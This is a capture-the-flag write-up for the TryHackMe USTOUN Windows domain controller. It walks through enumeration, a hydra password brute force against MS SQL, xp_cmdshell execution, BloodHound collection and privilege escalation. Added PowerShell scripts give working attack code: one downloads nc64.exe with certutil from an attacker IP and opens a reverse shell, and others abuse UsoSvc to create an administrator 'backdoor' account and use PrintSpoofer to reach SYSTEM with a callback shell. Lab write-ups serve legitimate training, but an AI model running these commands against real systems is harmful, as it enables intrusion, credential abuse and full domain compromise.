CTF-Writeups/TryHackMe/USTOUN.md
2021-04-29 11:21:01 +05:00


TryHackMe-USTOUN

Rustscan

PORT      STATE SERVICE            REASON          VERSION                   
53/tcp    open  domain?            syn-ack ttl 127
| fingerprint-strings:                     
|   DNSVersionBindReqTCP:                    
|     version                                           
|_    bind                                              
88/tcp    open  kerberos-sec       syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-04-03 18:57:34Z)                                   
135/tcp   open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack ttl 127 Microsoft Windows netbios-ssn                                                                    
445/tcp   open  microsoft-ds?      syn-ack ttl 127
464/tcp   open  kpasswd5?          syn-ack ttl 127
593/tcp   open  ncacn_http         syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped         syn-ack ttl 127
1433/tcp  open  ms-sql-s?          syn-ack ttl 127
3268/tcp  open  ldap               syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ustoun.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped         syn-ack ttl 127
3389/tcp  open  ssl/ms-wbt-server? syn-ack ttl 127
| rdp-ntlm-info: 
|   Target_Name: DC01
|   NetBIOS_Domain_Name: DC01
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: ustoun.local
|   DNS_Computer_Name: DC.ustoun.local
|   DNS_Tree_Name: ustoun.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-04-03T19:00:24+00:00
| ssl-cert: Subject: commonName=DC.ustoun.local
| Issuer: commonName=DC.ustoun.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-31T19:39:34
| Not valid after:  2021-08-02T19:39:34
| MD5:   fce5 375e 0190 ebc1 bf6e f384 468f 69f6
| SHA-1: dbe7 28d6 1980 1221 c9cb 712a 911e 99b2 303e 5de7
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQWPJp5aVu8JlPCbMkI/U6AjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9EQy51c3RvdW4ubG9jYWwwHhcNMjEwMTMxMTkzOTM0WhcNMjEw
| ODAyMTkzOTM0WjAaMRgwFgYDVQQDEw9EQy51c3RvdW4ubG9jYWwwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDErxES6mfg1M0Ur5tZJHE8BKV+voQAWLa4
| gKJfNi0av9nZ80wp2gJnQmHmZC0ACVpQUufMU9vlaCnk35rqsyM0/igqigSqWXAM
| OY/876ZWGbo5R1g3PjH4bE3mdPtPAJF0wfS8aZ8CdHlmuGDFlJmnu6qFEP/PoACC
| tf1S/vky+8GVs4uLFyxZOY5mam5PNULQvsMz2ycOPwj2CYwgWnrnA52N6m/6O9v7
| XK+K6XBSGHamrHR5EYFXG+u1vItwm4qpUZerUhZl2/WVKIIN4pDXWDCrS59nsVvc
| UC3fDPcgzruHIVJcA+g+CsEYdidS+E1NO3e3ZnWBeWE77ZCSDyTNAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAj9XeCOtYI4LrmeM7qZVQYuuDHIDosWkIw0LMpin4/gt0CDaEB1/uXUnX
| JnBUEHWMDdjzC22hTsTdUIntZgJAk81aQbPm3qMvSE1AXPCCfsN7GehA4kX/n42X
| xiz2rwZo/5DYH0JOWj8iCZyFMiXqSwQm3GWbG4LuTOct+x/rv0UwhyCvdllVRtwz
| P9BM/9qZqy3LecKtJh6UUo8FZ8zkekT9nsJ9/vCv3/THRUMOtEtSXdZUUqccXwRm
| 0HVLxT09wdGGbwdOzzdQSQfLmewi3rSZQf9liaXDtpkK60qrzj4zcyGG2QvX+9EI
| pZV0B4rzCUDWrpaTOsv8z7Qlgeb2GA==
|_-----END CERTIFICATE-----
|_ssl-date: 2021-04-03T19:01:07+00:00; +1m25s from scanner time.
5985/tcp  open  http               syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf             syn-ack ttl 127 .NET Message Framing
47001/tcp open  http               syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http         syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49709/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49712/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
49726/tcp open  msrpc              syn-ack ttl 127 Microsoft Windows RPC

From the scan we can see the domain name, ustoun.local, and that DC.ustoun.local is a domain controller (DNS, Kerberos, LDAP and SMB are all open) that also runs MS SQL Server on 1433 and WinRM on 5985.

PORT 445 (SMB)

We can only access the IPC$ share anonymously, and there is nothing useful in it by itself. However, that null session is enough for crackmapexec's RID brute force, which enumerates AD objects (users and groups) by guessing every relative identifier (RID) and asking the DC to resolve it to a name.

The RID cycle shows SVC-Kerb, which looks like a service account worth password brute-forcing. Since MS SQL is running, we can try the credentials there.

PORT 1433 (MS-SQL)

The database is Microsoft SQL Server, so let's brute-force the SVC-Kerb password against it with hydra.

Hydra found the password, so we can use Metasploit's admin/mssql/mssql_exec module for code execution.

So we have command execution. Alternatively we can use sqsh, an open-source program that gives an interactive database shell.

-S specifies the server to connect to: the target IP (and the port, if MS SQL were listening on something other than the default 1433)

-U specifies the username

-P specifies the password

Now, to execute Windows commands we use xp_cmdshell, which spawns a Windows command shell. xp_cmdshell is an extended stored procedure provided by Microsoft and stored in the master database, so the whole statement is EXEC master..xp_cmdshell 'whoami'. EXEC runs a stored procedure, and stored procedures are roughly the MySQL/MSSQL equivalent of functions. Note that xp_cmdshell is disabled by default; if it is off, you need sysadmin rights on the instance to enable it. Whatever it runs executes as the SQL Server service account, which is why the output of whoami matters.

We can find user.txt in C:\Users\SVC-Kerb.DC01

But when I tried to read it I got access denied.

So, to get a proper shell first, I uploaded the 64-bit netcat (nc64.exe); you can download it from here:

https://github.com/int0x33/nc.exe

Now at least we have a shell. To see which groups SVC-Kerb belongs to, run net user SVC-Kerb.
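The xp_cmdshell steps above (the sqsh session, and staging netcat for the reverse shell) can also be driven from a script. The following is an added example, not the writeup's own commands: it uses System.Data.SqlClient from pwsh on the attacking machine instead of sqsh or Metasploit. The target IP 10.10.10.10, the attacker IP 10.9.9.9, the listener port 4444, the password placeholder, the use of certutil as the download method and the assumption that SVC-Kerb's login is allowed to run sp_configure are all assumptions not stated on the page.

```powershell
# Added example (not from the original writeup). Assumed values: target and attacker
# IPs, listener port, and that the SQL login may run sp_configure (sysadmin).
$Server   = '10.10.10.10,1433'              # DC.ustoun.local, MS SQL on 1433 per the scan
$User     = 'SVC-Kerb'
$Password = '<password-found-by-hydra>'
$Attacker = '10.9.9.9'                      # assumed attacker IP serving nc64.exe over HTTP

$conn = New-Object System.Data.SqlClient.SqlConnection
$conn.ConnectionString = "Server=$Server;User Id=$User;Password=$Password;TrustServerCertificate=True"
$conn.Open()

# Statements that return no rows (sp_configure / RECONFIGURE)
function Invoke-SqlNonQuery([string]$Query) {
    $cmd = $conn.CreateCommand()
    $cmd.CommandText = $Query
    [void]$cmd.ExecuteNonQuery()
}

# Statements that return a single-column result set; collects column 0 of every row
function Invoke-Sql([string]$Query) {
    $cmd = $conn.CreateCommand()
    $cmd.CommandText = $Query
    $reader = $cmd.ExecuteReader()
    $rows = @()
    while ($reader.Read()) { $rows += $reader.GetValue(0) }
    $reader.Close()
    return $rows
}

# xp_cmdshell is off by default; turning it on needs sysadmin on the instance
Invoke-SqlNonQuery "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;"
Invoke-SqlNonQuery "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"

# xp_cmdshell returns one row per line of output and a trailing NULL row; drop the NULL.
# Single quotes in the command are doubled so they survive inside the T-SQL string literal.
function Invoke-XpCmdShell([string]$Command) {
    $escaped = $Command -replace "'", "''"
    Invoke-Sql "EXEC master..xp_cmdshell '$escaped'" | Where-Object { $_ -isnot [System.DBNull] }
}

Invoke-XpCmdShell 'whoami'      # the SQL Server service account; on this box that is SVC-Kerb

# Stage nc64.exe into a writable directory and start the reverse shell. xp_cmdshell
# blocks until the spawned process exits, so this call only returns when the shell dies:
# have the listener (port 4444) running before executing it.
Invoke-XpCmdShell "certutil -urlcache -split -f http://$Attacker/nc64.exe C:\Windows\Temp\nc64.exe"
Invoke-XpCmdShell "C:\Windows\Temp\nc64.exe $Attacker 4444 -e cmd.exe"

$conn.Close()
```

Start a listener on the attacking machine before the last call; the shell you catch runs as the same account xp_cmdshell reported for whoami, which is why the next step is to look at what that account can do.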

It shows that we are just a domain user. This looks like a service account, so we won't be able to do much with it directly. Since this is Active Directory, we can run SharpHound.ps1 to collect everything it can find about the domain.

I transferred the file to the target machine. Before running it, let's confirm the domain name: we already know it from the nmap scan, but just to be sure, spawn PowerShell by running powershell and run Get-ADDomain, which shows the domain's information.

Now we import SharpHound.ps1 and run its collector function.

The resulting zip needs to be transferred to our local machine so we can analyze the data in BloodHound.
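The collection steps above, as an added example rather than the writeup's own commands. It assumes SharpHound.ps1 has already been copied to C:\Windows\Temp on the DC (the path is an assumption) and that you are inside the netcat reverse shell, so the first step is to move from cmd.exe into PowerShell.

```powershell
# Added example (not from the original writeup). Assumed: SharpHound.ps1 already sits in
# C:\Windows\Temp on DC.ustoun.local; you are in the cmd.exe reverse shell.
# From cmd.exe:  powershell -ExecutionPolicy Bypass

# Confirm the domain; the DC has the AD module, so Get-ADDomain is available
Get-ADDomain | Select-Object DNSRoot, NetBIOSName, DomainSID   # expect ustoun.local / DC01

# Load the collector and gather everything, writing the archive next to the script
Import-Module C:\Windows\Temp\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain ustoun.local `
    -OutputDirectory C:\Windows\Temp -ZipFileName ustoun.zip

# This is the file to pull back to the attacking machine for BloodHound
Get-ChildItem C:\Windows\Temp\ustoun.zip
```

-CollectionMethod All is noisy (it touches every host in the domain for session and local-group data); on a single-box lab like this it is fine, on a real engagement consider the Default or DCOnly methods first.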

To transfer it I tried creating an SMB share on my local machine and copying the zip file there, but Windows gave an error and would not transfer the file, so I got a Meterpreter shell instead and downloaded the zip through it.

Run neo4j console

Then bloodhound

I imported the zip into BloodHound but didn't find anything interesting, so next we can upload PowerUp.ps1 to enumerate local misconfigurations and privilege-escalation paths.

PowerUp

You can download the script from here

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

Also read the usage guide here:

https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

Now import the PowerShell script and run Invoke-AllChecks.

Here we have two ways of getting admin. First let's try abusing the UsoSvc service, which PowerUp reports as modifiable by our user.

Service Abuse

Looking at the documentation

We can abuse a modifiable service to create a local administrator: either create a new user and add it to the local Administrators group, or add the current user to that group. PowerUp does this by temporarily rewriting the service's binary path to a net user / net localgroup command and restarting the service, so the command runs with the service's privileges. Keep in mind that this box is a domain controller, which has no local SAM: the account that gets created is a domain account, and Administrators is the domain's built-in Administrators group.

Creating a new user and adding it to the local Administrators group:

To check that the user was added:

Now, to switch to this user, we can log in with evil-winrm, since the WinRM service is running (port 5985 in the scan).
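The PowerUp steps above, as an added example that is not the writeup's own commands. It assumes PowerUp.ps1 was copied to C:\Windows\Temp (assumed path), and the account name and password are arbitrary choices for the example; PowerUp's own defaults are john / Password123!, which you should not leave in place.

```powershell
# Added example (not from the original writeup). Assumed: PowerUp.ps1 in C:\Windows\Temp,
# run from a PowerShell started inside the reverse shell. Account name/password are made up.
Import-Module C:\Windows\Temp\PowerUp.ps1
Invoke-AllChecks                                   # full sweep; reports UsoSvc as modifiable

# Look at just the service we intend to abuse before changing anything
Get-ModifiableService | Where-Object { $_.ServiceName -eq 'UsoSvc' }

# Option 1: create an account and put it in Administrators. PowerUp swaps the binary path
# for 'net user ... /add' and 'net localgroup Administrators ... /add', restarts the
# service to run them, then restores the original binary path. On a DC this creates a
# domain user, which is loud; remove it when you are done.
Invoke-ServiceAbuse -Name 'UsoSvc' -UserName 'backdoor' -Password 'Str0ngPassw0rd!2021'

# Option 2: run an arbitrary command instead, e.g. promote the account we already have
Invoke-ServiceAbuse -Name 'UsoSvc' -Command 'net localgroup Administrators ustoun\SVC-Kerb /add'

# Verify the result
net user backdoor
net localgroup Administrators
```

Once the account shows up in Administrators, log in with evil-winrm as that user to get an administrative session over port 5985. Note that group membership is evaluated at logon, so the existing SVC-Kerb shell does not gain anything from Option 2 until you start a new session.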

SeImpersonatePrivilege

Running whoami /all shows what privileges the user has; SVC-Kerb has SeImpersonatePrivilege, which is typical for service accounts.

Now we can abuse this privilege with PrintSpoofer, which uses it to impersonate SYSTEM.

Download the 64-bit version of PrintSpoofer:

https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

PrintSpoofer gives us a shell as SYSTEM, and from there we can access the Administrator's directory.
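The privilege check and the PrintSpoofer invocation, as an added example that is not the writeup's own commands. The paths under C:\Windows\Temp, the attacker IP 10.9.9.9, the port 4445 and the use of the nc64.exe already staged earlier are all assumptions.

```powershell
# Added example (not from the original writeup). Assumed: PrintSpoofer64.exe and nc64.exe
# are in C:\Windows\Temp; attacker IP/port are placeholders.
whoami /priv | findstr /i SeImpersonatePrivilege   # must show Enabled for this to work

# From an interactive console (the netcat reverse shell counts) take SYSTEM in place
C:\Windows\Temp\PrintSpoofer64.exe -i -c cmd

# From a non-interactive session such as evil-winrm, -i will not give you a usable
# prompt; spawn a second reverse shell as SYSTEM instead (listener on 4445 first)
C:\Windows\Temp\PrintSpoofer64.exe -c "C:\Windows\Temp\nc64.exe 10.9.9.9 4445 -e cmd"

# In the new shell: confirm the context, then the Administrator profile is readable
whoami                                             # nt authority\system
dir C:\Users\Administrator
```

The tool needs the Print Spooler service running on the box, which is the default on Windows Server; if it has been disabled the named-pipe trick it relies on fails and you fall back to the UsoSvc route above.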